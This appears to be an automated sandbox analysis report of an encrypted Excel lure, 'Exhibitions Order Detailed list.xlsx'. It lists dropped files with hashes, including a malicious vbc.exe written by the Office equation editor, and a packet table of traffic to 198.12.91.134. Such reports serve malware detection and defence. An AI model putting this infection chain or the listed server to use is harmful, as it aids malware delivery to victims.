Size (bytes):	49744
Entropy (8bit):	7.99056926749243
Encrypted:	true
SSDEEP:	768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
MD5:	63A6CB15B2B8ECD64F1158F5C8FBDCC8
SHA1:	8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
SHA-256:	AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
SHA-512:	BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
Malicious:	false
Preview:	.PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..\|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$.......kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........\|i ..."....V.g.\.G..p..p.X[.....%hyt...@..J...~.p.....\|..>...~.`..E_....iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w..y..\|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.\|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B5E1FBBD.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 687 x 111, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	2493
Entropy (8bit):	7.758903050821124
Encrypted:	false
SSDEEP:	48:F9quw7IIfnKFZR4r5vB4FRLiWWl4sXhGI4Y9E5ZBZ7CK0lrC:nQHO34r5vB4F7Wu6zGXZG/pC
MD5:	A5D66CCBEE7946308A985B0FA9CC74F7
SHA1:	D86FFD2A310B16C59849B8E574B673E36643FDDF
SHA-256:	6B8E5D3AFEA87B138C1084837085EDFF6D74B5001E92897CE6FF087058204B28
SHA-512:	7C65B24A8A88B88831CCF9089B89946FCC26748DB226488155899D73F7B63EAF32424432A66D78B385DED8381A66E2207EE6BF197D6BC550DDD222D323B73D98
Malicious:	false
Preview:	.PNG........IHDR.......o........2...qPLTE.............x.....`.5......5...``.......5..........`.......f.:.5..5.`.`...5..._...55........t.`.`......``4.....Z...U...\.9Z.3f...c.....n..X..N.44....f..:...\...`...:.f..f.:......<v......e:......d5.`.f..\....`````5444\..Z...........Z.....3...4_.78..8.f.f.45..3.5.........3....-l..Z.:.....:.:\.......4..]4..3..7c[._ff:.::.955....:..:.....d3ZZ:::.`5.U......IDATx...=O.P..an.p'.s.q0 I[5....c`.d.....t..{zhm...-.$...@.....q....K....+,.WXB...^a....z...=.z.F...X.E7....(.:.{...px...W..^..N..g....S.c...r.W.CK.s...[*Kv.-5..^.:.f..^.../..BQ....H.~H...[.v./f..y.e..Y.Y.}.CB...`..6{...mz..J.z.O../.m&uV......y._...g)...^..\|..Zl..2>.M..c...<..h..~...^..<....i.K..-\|.........[A.Ke....sT..H..Z..y`..+v..Vp...U..H6z..J........._...,.S.....t...[..^a....z.%..K....+,.WXB...^a.................`.....Kq7..w....\...'..'....b.......Q#.j.!.,.c..#A..J..^..P%J..^.m.K.=..w.<..k.,..>..w=.v...Y...........&......r.kX-.%6.S..U.B.\|........0.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BD98695F.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 779 x 181, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	5842
Entropy (8bit):	7.92185581034873
Encrypted:	false
SSDEEP:	96:+Q9KyOE9ulJ01zAcTCcAZd+0Mvin1EFi0sAMcNV99iyysx8JXmaaINsWHfjMzNzl:4yvmJ0VmQE/Ovi0aa5EMzNzl
MD5:	871E67261292737F85DEE051B2EF5B1A
SHA1:	3108E69E8BEABB0CD820696E9F22889B5E7D3224
SHA-256:	F35AAA75635EB695B2DA69C932ECBD5AD4DB934EBFB0433DAC7913C2B7551A6A
SHA-512:	3C0CC7DF2D5080166C1C35C0D120CA686A8EF09348AB0F28CE6859FEC9F7DD3AB16955D79E1C092A5D78666FAE978F69E632D9FB307776E69FD586ADA605FEAF
Malicious:	false
Preview:	.PNG........IHDR.............'P......gAMA......a.....sRGB.........pHYs..........o.d....PLTE...............LLL.....................................................................ppp......`.6................?.6.._...`Bi...Y..f...%E........_...5DG....._.tNq.8.6..<?.....5...PVj..X.1...4U..._z..ANTT.b...kt..zZ5...........__..........~.......ff`.........H#....DIDATx..[.[....R..lK.\|....E*........P.....sz...3..I...X#.....ffwv...n...~:.X...E}......\`}.g..>.3.X........r!.`.:..B8\.f0f....lx4..7s.o....F.&..\............s!\........o.....Ssa....1.X.<9."sso...G.\XX..q.2.....D@.0...".'.'/0.......K.px......X.....`......iD..c.-.....J//.o.,....<......9m). ..R...@'..q.y....N..&$...v94.q..<.w.\.P......f_.... ...B.0}o.....y......l.Z..PzRb..F.....[..)..........J,....B....t(..BR...w .Q...S...H...{.....7P........o...Ol..fV.\.........}.......A'.g.:E.7.u.........\|.5pDj..f0.E:n..'. .....E..j^..tp\H;....3...C\..u.e..P.{...6.9....".6M....K..".F.D.a0.....\|>.T...x.Yj....C".

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BEC2566A.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1183280
Entropy (8bit):	2.0961074211733566
Encrypted:	false
SSDEEP:	3072:e34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+D8nG/qc+r:w4UcLe0JOcXuunhqcIhqcM
MD5:	8BF122C0BC2F05F9C4BE47C77C8003B7
SHA1:	17401719239E65BAF881F5065819F4DEA09F75DA
SHA-256:	D0966DBE7D5D1B36C4BF893832A6872F9DBF2E2620B96BE945DE225DA324B732
SHA-512:	9AD487CC39D7639FDB51D917DE51E966A2C2B85191B71C660748180D0950FE41BAC9502DA2C6497492997914394FE9A7A1B6917A06C2F8AD608F78D5D487572C
Malicious:	false
Preview:	....l...............j...........m>...B.. EMF....0...3...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i..................................................... Y$.......-z)Y.@C.%...............`........N4Z`...X...........D....N4Z`...X... ....y)YX...`... ............z)Y............M....................OE.....%...X...%...7...................{$..................C.a.l.i.b.r.i...-.0...d....._`#Y...................vdv......%...........%...........%...........!...............................".......................%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@....k.......L.......................P... ...6...F...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C0C16556.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
Category:	dropped
Size (bytes):	7006
Entropy (8bit):	7.000232770071406
Encrypted:	false
SSDEEP:	96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
MD5:	971312D4A6C9BE9B496160215FE59C19
SHA1:	D8AA41C7D43DAAEA305F50ACF0B34901486438BE
SHA-256:	4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
SHA-512:	618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
Malicious:	false
Preview:	......JFIF..............Exif..MM.......@......../..@..................C...........................$ &%# #"(-90(6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D0083269.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11303
Entropy (8bit):	7.909402464702408
Encrypted:	false
SSDEEP:	192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
MD5:	9513E5EF8DDC8B0D9C23C4DFD4AEECA2
SHA1:	E7FC283A9529AA61F612EC568F836295F943C8EC
SHA-256:	88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
SHA-512:	81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
Malicious:	false
Preview:	.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...\|.e............{......z.Y8..DiE.46.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=\|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p\|f6.^._.c..'''Qll..........W.[..s..q+e.:.\|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D5EA351B.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
Category:	dropped
Size (bytes):	85020
Entropy (8bit):	7.2472785111025875
Encrypted:	false
SSDEEP:	768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
MD5:	738BDB90A9D8929A5FB2D06775F3336F
SHA1:	6A92C54218BFBEF83371E825D6B68D4F896C0DCE
SHA-256:	8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
SHA-512:	48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
Malicious:	false
Preview:	......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(

C:\Users\user\Desktop\~$Exhibitions Order Detailed list.xlsx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:	96114D75E30EBD26B572C1FC83D1D02E
SHA1:	A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:	52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:	false
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	6.650522833717378
Encrypted:	false
SSDEEP:	1536:EAPGkc1ug6GUMu+Yg2WGI5XZ4QmiPYefCGk4H:X2bUMEWfXZiea
MD5:	27BF14807BC9D5CD2D823293F43C3A3A
SHA1:	08EEED11867AA351BE0D6C48DA283721EE6C0769
SHA-256:	55FD5769DF0DF23D4140A34D07DC2C833B43AC1060F4D0992BDD27316041C69A
SHA-512:	C2BCD733A0BFD1B9E56B630E4FAE6A45951A843946A389F8987C48A3B047CA9B9F74A5A01AFC7D7589F156691220E474553229F485B6DE4F902DB566A6A0D245
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 22%, Browse Antivirus: ReversingLabs, Detection: 11%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L......K.................@..........D........P....@..................................`......................................tK..(....p...[..................................................................(... .......\|............................text....=.......@.................. ..`.data...\....P.......P..............@....rsrc....[...p...`...`..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	CDFV2 Encrypted
Entropy (8bit):	7.994691802271367
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	Exhibitions Order Detailed list.xlsx
File size:	1239040
MD5:	c8e623590aae92259642c8c80f761493
SHA1:	877da933e035b90f881d2c7ef3fa37f9065b6aa7
SHA256:	257645cd8e215cd4f9c2c153f3605e7389a2aed04a870a1aa0b4a4d9aa5762b3
SHA512:	42b645d273db688b69e591e7a0afd6d165a93afcfbc7ed16c601fbd282cdf0abe5a1955ec0f8aa7c936c811fd7b4a795d67b25048f5d494e68f9415b1eba0031
SSDEEP:	24576:mArO9NZrYnnXyhxSUKmCW+A+e6QCmRb5QX/hY8Ku:mArO9NqnnizSUnCg6Q95Ssu
File Content Preview:	........................>.......................................................................................................\|.......~......................................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 2, 2021 14:50:26.903244019 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.014524937 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.014723063 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.015583038 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.128052950 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.128122091 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.128155947 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.128165007 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.128189087 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.128204107 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.128206015 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.128262997 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.240540981 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.240597010 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.240612984 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.240633965 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.240643024 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.240681887 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.240685940 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.240724087 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.240725994 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.240761042 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.240767002 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.240799904 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.240806103 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.240838051 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.240844965 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.240881920 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.351831913 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.351888895 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.351903915 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.351927996 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.351933956 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.351967096 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.351974010 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.352005005 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.352015018 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.352051973 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.352054119 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.352098942 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.352099895 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.352137089 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.352145910 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.352174997 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.352180958 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.352212906 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.352221012 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.352251053 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.352257013 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.352288961 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.352293015 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.352324963 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.352334023 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.352371931 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.352372885 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.352413893 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.352416992 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.352451086 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.352458954 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.352494001 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.353993893 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.463583946 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.463645935 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.463685036 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.463725090 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.463764906 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.463783026 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.463802099 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.463819027 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.463824987 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.463829041 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.463841915 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.463880062 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.463884115 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.463901043 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.463932991 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.463951111 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.463977098 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.464015961 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.464041948 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.464052916 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.464060068 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.464072943 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.464097977 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.464134932 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.464144945 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.464173079 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.464209080 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.464241982 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.464247942 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.464253902 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.464257002 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.464257956 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.464299917 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.464322090 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.464337111 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.464364052 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.464375973 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.464387894 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.464416027 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.464437008 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.464452982 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.464474916 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.464490891 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.464517117 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.464529037 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.464549065 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.464576006 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.464576960 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.464622021 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.464637041 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.464659929 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.464669943 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.464699030 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.464724064 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.464736938 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.464745045 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.464775085 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.464792013 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.464812040 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.464813948 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.464852095 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.464869022 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.464895964 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.466506958 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.576018095 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.576081038 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.576121092 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.576160908 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.576200008 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.576246977 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.576288939 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.576301098 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.576327085 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.576337099 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.576343060 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.576366901 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.576380014 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.576406002 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.576442003 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.576478958 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.576479912 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.576489925 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.576494932 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.576517105 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.576530933 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.576565981 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.576581955 CEST	49165	80	192.168.2.22	198.12.91.134
